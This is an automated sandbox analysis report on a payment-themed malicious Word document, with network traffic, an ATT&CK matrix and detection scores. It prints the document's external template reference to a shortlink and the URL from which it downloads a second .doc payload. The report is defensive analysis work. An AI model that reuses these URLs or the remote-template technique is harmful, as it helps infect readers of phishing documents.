Source: global trafficHTTP traffic detected: GET /i1P8xb HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: smol.reConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 203.202.232.170
Source: global trafficDNS traffic detected: DNS query: smol.re
Source: unknownNetwork traffic detected: HTTP traffic on port 60827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60838
Source: unknownNetwork traffic detected: HTTP traffic on port 60838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60832
Source: unknownHTTPS traffic detected: 104.21.20.196:443 -> 192.168.2.24:60827 version: TLS 1.2
Source: classification engineClassification label: mal60.evad.winDOC@2/1@1/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$L-2025-00947 PAYMENT.docx.docJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{EC55AEE9-9F06-48AA-BDCA-D009AFE5223F} - OProcSessId.datJump to behavior
Source: FFL-2025-00947 PAYMENT.docx.docOLE indicator, Word Document stream: true
Source: FFL-2025-00947 PAYMENT.docx.docOLE document summary: title field not present or empty
Source: FFL-2025-00947 PAYMENT.docx.docOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: FFL-2025-00947 PAYMENT.docx.docVirustotal: Detection: 23%
Source: FFL-2025-00947 PAYMENT.docx.docReversingLabs: Detection: 33%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: FFL-2025-00947 PAYMENT.docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: FFL-2025-00947 PAYMENT.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: FFL-2025-00947 PAYMENT.docx.docInitial sample: OLE summary lastprinted = 2024-11-08 04:15:17
Source: FFL-2025-00947 PAYMENT.docx.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: settings.xml.relsExtracted files from sample: https://weneedtocreatebestthingswithgrreatnewscoming.doc@smol.re/i1p8xb
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Exploitation for Client Execution
Boot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1668132 Sample: FFL-2025-00947 PAYMENT.docx.doc Startdate: 18/04/2025 Architecture: WINDOWS Score: 60 9 smol.re 2->9 11 res-stls-prod.edgesuite.net.globalredir.akadns88.net 2->11 13 a726.dscd.akamai.net 2->13 19 Suricata IDS alerts for network traffic 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 Contains an external reference to another file 2->23 6 WINWORD.EXE 504 111 2->6         started        signatures3 process4 dnsIp5 15 203.202.232.170, 60830, 60834, 80 ACCESSSMART-ASAccessSmartSolutionsIndiaPvtLtdIN India 6->15 17 smol.re 104.21.20.196, 443, 60827, 60828 CLOUDFLARENETUS United States 6->17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
FFL-2025-00947 PAYMENT.docx.doc23%VirustotalBrowse
FFL-2025-00947 PAYMENT.docx.doc33%ReversingLabsDocument-Word.Trojan.Heuristic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://203.202.232.170/630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc0%Avira URL Cloudsafe
https://smol.re/i1P8xb0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
smol.re
104.21.20.196
truefalse
    high
    a726.dscd.akamai.net
    23.205.104.9
    truefalse
      high
      s-0005.dual-s-msedge.net
      52.123.128.14
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://203.202.232.170/630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doctrue
        • Avira URL Cloud: safe
        unknown
        https://smol.re/i1P8xbtrue
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        203.202.232.170
        unknownIndia
        133309ACCESSSMART-ASAccessSmartSolutionsIndiaPvtLtdINtrue
        104.21.20.196
        smol.reUnited States
        13335CLOUDFLARENETUSfalse
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1668132
        Start date and time:2025-04-18 06:55:06 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 34s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
        Run name:Potential for more IOCs and behavior
        Number of analysed new started processes analysed:22
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:FFL-2025-00947 PAYMENT.docx.doc
        Detection:MAL
        Classification:mal60.evad.winDOC@2/1@1/2
        Cookbook Comments:
        • Found application associated with file extension: .doc
